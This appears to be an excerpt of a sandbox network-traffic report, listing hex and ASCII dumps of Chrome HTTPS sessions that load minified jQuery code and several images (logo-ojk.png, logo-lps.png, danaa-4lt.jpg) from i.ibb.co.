      2024-09-27 02:26:43 UTC1369INData Raw: 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65 6e 67 74 68 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4c 2e 61 70 70 6c 79 28 65 2c 4f 2e 63 61 6c 6c 28 74 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e
      Data Ascii: 0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){var n=e.
      2024-09-27 02:26:43 UTC1369INData Raw: 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 73 70 6c 69 74 28 22 7c 22 29 2c 72 3d 6e 2e 6c 65 6e 67 74 68
      Data Ascii: h&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function fe(e,t){var n=e.split("|"),r=n.length
      2024-09-27 02:26:43 UTC1369INData Raw: 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64
      Data Ascii: Element&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(function(e){return a.appendChild(e).appendChild(C.createElement("d
      2024-09-27 02:26:43 UTC1369INData Raw: 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3b 69 66 28 22 2a 22 3d 3d 3d 65 29 7b 77 68 69 6c 65 28 6e 3d 6f 5b 69 2b 2b 5d 29 31 3d 3d
      Data Ascii: urn[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1==
      2024-09-27 02:26:43 UTC1369INData Raw: 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65
      Data Ascii: tAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&v.push(":enable


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      17192.168.2.649742162.19.58.1564431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:43 UTC353OUTGET /fpXTF6b/danaa-4lt.jpg HTTP/1.1
      Host: i.ibb.co
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: */*
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:43 UTC380INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 27 Sep 2024 02:26:43 GMT
      Content-Type: image/jpeg
      Content-Length: 15204
      Connection: close
      Last-Modified: Tue, 07 Nov 2023 06:40:44 GMT
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Cache-Control: public
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, OPTIONS
      Accept-Ranges: bytes
      2024-09-27 02:26:43 UTC3716INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 39 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 36 30 0a ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 01 90 03 20 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00
      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 60C ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO "
      2024-09-27 02:26:43 UTC4096INData Raw: 39 35 69 22 48 d7 6a 28 50 3b 01 4f 03 15 8d 6a aa 6a d1 8a 48 da 8d 07 07 79 49 b6 2d 14 51 58 9d 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 55 2d 52 fd 34 fb 47 99 8f 38 f9 47 a9 ab 8c c1 54 92 70 07 26 b8 1f 10 6a 7f da 17 a4 46 c7 c9 8f 85 f4 3e f5 be 1e 8b ab 3b 74 39 b1 55 bd 94 34 dc cc 9a 69 27 99 a5 95 8b 33 1c 92 69 94 51 5e fa 49 2b 23 c1 6d bd 42 8a 28 a6 20 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 f7 ae cb c3 1a b7 da 62 16 93 9f de 20 f9 0f a8 ae 36 a5 b5 9d ed ae 63 9e 33 86 43 9f ad 73 e2 68 2a d0 69 ee 6f 87 ac e9 4e eb 63 d4 01 e2 96 aa 69 b7 89 7d 67 1c e9 fc 43 91 e8 6a d5 78 2d 34 ec cf 7e 32 52 57 42 d1 45 14 8a
      Data Ascii: 95i"Hj(P;OjjHyI-QXEPEPEPEPEPEPEPEPU-R4G8GTp&jF>;t9U4i'3iQ^I+#mB( (((((((((b 6c3Csh*ioNci}gCjx-4~2RWBE
      2024-09-27 02:26:43 UTC4096INData Raw: 4d a7 fd 72 5f e5 5c d9 8f c3 13 ab 2e f8 a4 5e a2 8a 2b cb 3d 71 2a 8e b1 68 b7 ba 6c d0 91 92 57 2b f5 15 7e 9a c3 23 14 27 67 72 64 ae ac 79 5f d7 ad 15 3d f2 79 57 f7 11 8e 02 c8 c0 7e 66 a0 af a4 8b ba 4c f9 a9 2e 56 d1 a9 e1 a9 8c 3a d4 3e 8f 95 35 e8 23 a5 79 9e 98 c5 35 3b 56 1d a5 5f e6 2b d3 07 4a f2 71 eb f7 89 f9 1e be 5f 26 e0 d7 98 b4 51 45 70 9e 80 52 1a 5a 4a 00 a7 a9 5d 2d 9d 84 d3 93 ca af 1f 5e d5 e6 ee c6 47 67 62 4b 31 c9 3e f5 d4 78 ca f7 98 ac 90 ff 00 b6 ff 00 d2 b9 6a f5 f0 34 b9 61 cf dc f1 b1 f5 39 a7 cb d1 05 75 fe 0e b3 d9 04 97 6c 39 90 ed 5f a0 ae 4a 34 69 64 58 d0 65 98 80 07 bd 7a 55 8d b2 da 5a 45 02 f4 45 c6 7d 69 63 ea 72 c1 47 b8 60 29 f3 4d c9 f4 30 fc 61 67 be d6 3b b4 1f 34 47 0d f4 3f fd 7a e3 eb d3 6f 20 5b 9b 59
      Data Ascii: Mr_\.^+=q*hlW+~#'grdy_=yW~fL.V:>5#y5;V_+Jq_&QEpRZJ]-^GgbK1>xj4a9ul9_J4idXezUZEE}icrG`)M0ag;4G?zo [Y
      2024-09-27 02:26:43 UTC3296INData Raw: 01 5e cf d9 b3 cc c7 d0 d3 9e 26 25 2a fd e1 49 4a bf 78 7d 6b d3 96 c7 96 b7 3d 46 2f f5 4b fe ed 49 51 c3 fe a5 3e 82 9f 5f 36 f7 3e 9a 3b 21 68 a4 35 53 53 bb 16 56 13 4f 9e 55 78 fa f6 a1 2b bb 03 92 4a ec e2 3c 45 77 f6 bd 5e 42 0f c9 1f c8 bf d6 b3 28 24 92 49 39 26 8a fa 2a 70 50 8a 8a 3e 6e a4 dc e4 e4 3e 18 9a 69 92 14 fb ce c1 47 e3 5e 97 69 0a db db 47 0a 0f 96 35 0a 3f 0a e3 3c 29 6b f6 8d 57 cd 61 f2 c2 37 7e 27 81 fd 6b ba e9 5e 5e 3e 77 9a 8a e8 7a b9 7d 3b 45 cf b8 b4 51 45 70 9e 80 52 1a 5a 0f 4a 00 f3 ff 00 12 da fd 97 57 90 81 85 97 f7 83 f1 eb fa d6 4d 76 7e 30 b4 12 58 a5 ca 8f 9a 26 c1 fa 1a e3 2b dc c2 54 e7 a4 bc 8f 07 17 4d c2 ab f3 00 48 60 41 c1 07 83 5e 93 a4 dd 0b cd 3a 19 f3 cb 2f 3f 5e 86 bc da ba bf 06 dd e5 26 b4 27 ee fc
      Data Ascii: ^&%*IJx}k=F/KIQ>_6>;!h5SSVOUx+J<Ew^B($I9&*pP>n>iG^iG5?<)kWa7~'k^^>wz};EQEpRZJWMv~0X&+TMH`A^:/?^&'


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      18192.168.2.649740162.19.58.1564431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:43 UTC352OUTGET /C1f1Y0C/logo-lps.png HTTP/1.1
      Host: i.ibb.co
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: */*
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:43 UTC379INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 27 Sep 2024 02:26:43 GMT
      Content-Type: image/png
      Content-Length: 15795
      Connection: close
      Last-Modified: Sun, 27 Aug 2023 06:52:06 GMT
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Cache-Control: public
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, OPTIONS
      Accept-Ranges: bytes
      2024-09-27 02:26:43 UTC3717INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 00 cb 08 03 00 00 00 af 53 91 74 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 03 00 50 4c 54 45 47 70 4c 60 60 62 60 60 62 f5 86 34 60 60 62 5f 5f 62 60 60 62 60 60 62 60 60 62 5f 5f 61 f5 86 34 f5 86 34 f5 86 34 63 63 64 61 61 63 f5 86 33 f5 86 34 5f 5f 61 60 60 62 60 60 62 60 60 62 5f 5f 61 5e 5e 61 60 60 62 f5 86 34 60 60 61 60 60 62 60 60 63 f6 86 34 5f 5f 61 60 60 62 60 60 61 60 60 62 60 60 62 60 60 62 5f 5f 61 60 60 62 5d 5d 5f 5f 5f 62 60 60 62 60 60 62 60 60 61 60 60 62 5f 5f 62 60 60 62 60 60 62 60 60 62 60 60 62 5f 5f 5f 5f 5f 62 f5 86 34 5e 5e 5f 60 60 62 60 60 62 60 60
      Data Ascii: PNGIHDRStgAMAasRGBpHYs.#.#x?vPLTEGpL``b``b4``b__b``b``b``b__a444ccdaac34__a``b``b``b__a^^a``b4``a``b``c4__a``b``a``b``b``b__a``b]]___b``b``b``a``b__b``b``b``b``b_____b4^^_``b``b``
      2024-09-27 02:26:43 UTC4096INData Raw: 9a 71 3f c4 00 06 0f ea 21 84 ad 88 7c 97 44 3a 05 d8 80 9f 5b 0f 80 85 42 c0 4c e9 67 7a a2 36 78 be 13 ee d3 2b 5b f7 95 46 eb 6e 5d 23 2a d0 e9 52 cc 76 76 5e b2 1a 94 3d 08 fa 24 1d d0 3d fc 94 f6 6c 34 ef 87 eb 3e 1c d6 4b 42 d1 45 b9 11 ec fc 73 70 46 21 79 07 0f e7 1b 0a 88 b9 48 27 c0 cf 9e 50 bb db c8 a9 a8 10 3e 01 13 10 56 f7 6a 7c 71 e6 24 15 73 53 6c d7 a2 dc bf e8 63 ff 7b 52 e9 ef 49 a6 2d 02 4d e1 2c bc 5a 2a 1c 23 69 f3 c8 81 ed c5 96 5a 19 e8 ab 51 d4 79 27 40 14 24 83 a9 a0 7f 0b 30 6b 40 57 cc 03 2f 93 73 f6 24 d9 8a 1b 24 e7 23 60 53 fe 0d b3 e7 a9 24 1b 5d ab b0 1a f0 7b 35 62 eb 75 e1 90 f6 f9 57 b1 cd 5e 10 cf a1 ef 99 a7 53 12 a2 ae c8 91 f2 71 a3 d8 86 0b df 84 80 75 41 9f 95 5c 77 a5 22 72 1b fa fb b9 57 6b a5 56 2d 21 e8 42 50
      Data Ascii: q?!|D:[BLgz6x+[Fn]#*Rvv^=$=l4>KBEspF!yH'P>Vj|q$sSlc{RI-M,Z*#iZQy'@$0k@W/s$$#`S$]{5buW^SquA\w"rWkV-!BP
      2024-09-27 02:26:43 UTC4096INData Raw: b9 9b e7 d3 a4 a9 c4 19 1d 3a a0 83 63 83 12 c0 8c 36 07 3a 30 02 35 e5 85 14 e4 a0 65 d0 81 35 ba 04 2f b6 9c 00 1c 6e 55 ba b2 00 7a 2b 52 46 df 2a c1 07 94 47 2e fc 84 4a f1 48 4c a4 8d 03 3a dc c2 c7 3d e8 a4 a5 62 9e 9d 0e e8 72 22 48 3f 14 04 85 48 0a a0 2f 3c 64 f8 ce bc 00 95 27 3e 2c 74 a0 cd 3d a0 4e 01 93 9b 1e 7b 8b a4 87 26 8e d6 3a ac dc 3f 9e d3 c4 5e 75 38 50 74 40 07 cf 2c 25 e9 e9 2b 03 1d d6 f4 3c d9 50 82 de 9c 32 08 7a 90 b5 bf c0 2a e8 28 b5 b0 96 b8 5b 10 32 96 52 46 ca d3 95 05 d0 4f 15 98 20 2b 19 bb 4c 84 1c a4 82 de 1e 78 08 e2 83 ee 86 fc e9 4a c6 2a 1b 61 5b 4a 2d e8 7f 4e 96 49 60 14 a8 fe ae 4f 1e 74 88 d5 4c 8b 03 ba 46 d2 87 bc fd 05 49 1b 8b 7b 08 ad 3a c7 dc 37 39 2d 8b f4 67 2a 51 8f 23 e9 7d cd 4a fa b5 24 e7 1c 8a ca
      Data Ascii: :c6:05e5/nUz+RF*G.JHL:=br"H?H/<d'>,t=N{&:?^u8Pt@,%+<P2z*([2RFO +LxJ*a[J-NI`OtLFI{:79-g*Q#}J$
      2024-09-27 02:26:43 UTC3886INData Raw: b0 31 28 07 f5 ff 94 66 30 d8 f7 c4 4e cc 81 54 59 3a 1f 43 cb a5 07 3a 9c d0 45 9e 6e ab 03 3a 14 ba 95 09 75 13 2a 3e 51 09 74 98 ec 7c 99 91 97 04 e8 29 fa fb 66 98 05 3d 69 de 50 2b da bd aa 02 53 08 67 13 d6 96 23 2f 02 1d 31 3e 1c 2d 84 c4 75 41 f7 4c f1 b0 f4 73 89 22 b2 37 7d e8 ee 4b d5 a0 43 bb 64 52 0c 54 91 85 85 85 f8 42 21 71 01 72 fb 0a b2 08 17 f9 94 da d0 73 50 48 cf 54 b0 45 0a a0 63 2a 2e 3f ac ad ec 52 3a a0 e7 50 42 0b de 79 ce 55 98 54 3d 58 6e b2 89 a0 3b 19 89 60 24 15 d0 1d 45 38 1c f1 46 28 75 d0 e3 b7 49 4d 17 e8 63 ab f1 51 dd 80 a5 46 a2 0f 2b e6 13 d1 97 f4 1e 53 10 8c 58 5a 2a 4d 7e a2 09 ed ad f0 f5 51 82 de 4c 12 af 08 ad 6a 02 12 11 d1 50 b7 09 a4 04 83 5b f0 98 77 37 42 8e 96 28 e9 54 09 cc 19 24 b1 51 ea 80 4e df 1d 20
      Data Ascii: 1(f0NTY:C:En:u*>Qt|)f=iP+Sg#/1>-uALs"7}KCdRTB!qrsPHTEc*.?R:PByUT=Xn;`$E8F(uIMcQF+SXZ*M~QLjP[w7B(T$QN


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      19192.168.2.649741162.19.58.1564431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:43 UTC352OUTGET /khmXKS2/logo-ojk.png HTTP/1.1
      Host: i.ibb.co
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: */*
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:43 UTC379INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 27 Sep 2024 02:26:43 GMT
      Content-Type: image/png
      Content-Length: 45960
      Connection: close
      Last-Modified: Sun, 27 Aug 2023 06:53:29 GMT
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Cache-Control: public
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, OPTIONS
      Accept-Ranges: bytes
      2024-09-27 02:26:43 UTC3717INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 58 00 00 01 3b 08 06 00 00 00 01 ee ff b5 00 00 20 00 49 44 41 54 78 9c ec 9d 7b 9c 1c 55 99 f7 7f cf a9 ea 9e 9e c9 64 92 4c 26 93 0b 91 8d 88 88 11 42 08 49 60 11 11 11 91 65 d1 45 57 77 d7 d5 d5 f5 c6 aa 80 49 26 04 70 d5 e5 f5 55 74 21 64 72 43 04 76 c5 5d f7 f5 b6 cb ba 5e 40 10 d0 45 14 02 24 04 42 22 97 24 84 90 0c b9 11 92 49 32 97 9e ee 3a e7 79 ff a8 aa ee ba 76 f7 4c 26 97 99 79 be 1f 9a e9 3e 55 e7 d4 a9 ea 9a a9 5f 7e cf 53 4f 01 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08
      Data Ascii: PNGIHDRX; IDATx{UdL&BI`eEWwI&pUt!drCv]^@E$B"$I2:yvL&y>U_~SO
      2024-09-27 02:26:43 UTC4096INData Raw: d9 90 98 ec 1e aa c6 1e 78 54 4d a8 ae 55 44 60 c4 0a 8b 7a 61 c2 60 d8 30 35 d9 1d 61 21 91 f2 68 9d 50 b2 3b 01 00 83 8c 01 5b 16 38 d7 00 53 d7 00 ae 1f 05 ae ab 07 67 73 40 5d 0e 9c a9 03 db 36 60 d9 25 87 49 b1 06 b4 06 39 45 50 b1 00 2a e4 41 7d bd 40 be 17 c8 77 81 f2 3d 40 6f b7 7f 60 dc 97 bb b9 92 60 4b ab ec ce 6c 00 8d e4 64 f7 c8 33 0b c3 c9 ee 7e 5b 4a b2 bb 17 8a 0c 96 7e a8 96 ec 5e 6a f7 c3 a0 5e 7b 06 d8 d7 67 cc a2 37 ac 59 7d d7 e1 9d b1 82 20 08 82 e0 72 5c 0a ac 5f 9d 75 56 ab 22 5a 4a 44 7f eb 1b 14 41 81 95 24 b2 7c 81 15 ca af f2 34 89 05 84 04 58 ea dd 84 81 b1 52 2b bb 47 9d 9a 60 cd 2c 5f 44 25 e6 5a 79 7b 12 cd b5 52 14 7f fc 4d 50 48 01 f1 e7 13 82 01 62 70 36 07 33 6a 34 9c a6 71 28 34 4f 84 33 ae 15 ce d8 56 98 51 4d 40 36
      Data Ascii: xTMUD`za`05a!hP;[8Sgs@]6`%I9EP*A}@w=@o``Kld3~[J~^j^{g7Y} r\_uV"ZJDA$|4XR+G`,_D%Zy{RMPHbp63j4q(4O3VQM@6
      2024-09-27 02:26:43 UTC4096INData Raw: 68 88 30 fd 0e 41 f7 ae c3 d4 92 0e 15 fa 02 0c 53 a9 da bc 52 40 3e 8f ec 83 0f c0 7e e8 37 a0 bd 7b c1 d9 6c 6a 79 87 52 c8 d1 fb 9c 01 75 16 8d 5e 78 da 53 6b ee 1a 8c f3 5e 10 04 41 38 f6 0c 6b 81 05 00 8f cd 99 f3 b7 16 d1 0f 7c 07 25 96 ec 4e 81 ea ef 70 13 da f7 fe c9 34 3c f3 ae 0b 41 96 15 11 38 e1 7a 57 65 47 a9 52 b2 3b 25 f4 4d 17 40 69 95 dd a3 7d 81 f8 76 d3 c7 a4 d0 98 40 e5 e7 13 06 5d ad 68 b2 7b a9 6f 44 4c d5 5c d9 1d 51 07 cd 5d bf 52 c9 86 c3 4d 76 77 45 1b c3 24 ac 53 6d 4c 63 4c 05 e1 15 69 03 c0 85 02 ec df ff 1e 75 0f fd 06 b4 73 07 d8 b6 e3 42 cb 5b d7 6f 83 7b fe 39 19 e0 87 3d 05 67 d1 cc 75 52 33 4b 10 04 61 a8 33 ec 05 16 00 3c 39 7b ce 4f d8 a2 bf f2 c3 82 69 c9 ee 16 33 0e 8d 6f c1 93 97 5e 06 28 cb 13 20 71 b7 2a 4d bc 24
      Data Ascii: h0ASR@>~7{ljyRu^xSk^A8k|%Np4<A8zWeGR;%M@i}v@]h{oDL\Q]RMvwE$SmLcLiusB[o{9=guR3Ka3<9{Oi3o^( q*M$
      2024-09-27 02:26:43 UTC4096INData Raw: 0b ac 79 0b 16 4d b7 2c b5 aa 8e a8 69 5c eb 84 0a 21 be da 73 ae a2 c2 2b d9 ad 1a cc ea ec 81 30 21 11 0e bc fe 3a 36 6d da 84 8e 9d bb d0 e7 38 a5 72 0b 40 49 54 f5 28 a5 1e 29 3a c5 9f 03 f4 c8 b2 f6 c5 52 05 bc 02 f3 e6 cd cb 41 65 4e b4 14 4d 67 c6 69 b6 6d 9f 6d 8c 99 c9 40 ab d6 3a 9b b5 2c 8c 69 6c c4 c4 09 2d 98 32 65 0a 26 4e 99 8c dc a8 06 80 94 2b ac 82 a2 0b 41 71 d3 ff dc ab 8a cb 4a 46 55 ff 97 c3 2f a6 9a e8 82 95 85 99 ff 27 83 8c 01 d8 c0 18 53 da 3f 02 19 af 3e 99 57 df 83 60 e0 dd ad 69 4c f8 b1 47 88 ef 53 48 10 46 96 c7 c4 22 00 a7 50 c0 81 ce fd e8 c9 f7 f9 e1 c0 bd c6 98 af bf be f7 d0 ed df ff fe ed 72 97 a0 20 08 c7 94 11 2f b0 00 a0 6d e1 75 ff 01 36 1f 6b 1d 37 16 aa be be f4 a8 97 a8 78 02 06 5e 9a c1 0f e3 25 25 bb 27 89 a6
      Data Ascii: yM,i\!s+0!:6m8r@IT():RAeNMgimm@:,il-2e&N+AqJFU/'S?>W`iLGSHF"Pr /mu6k7x^%%'
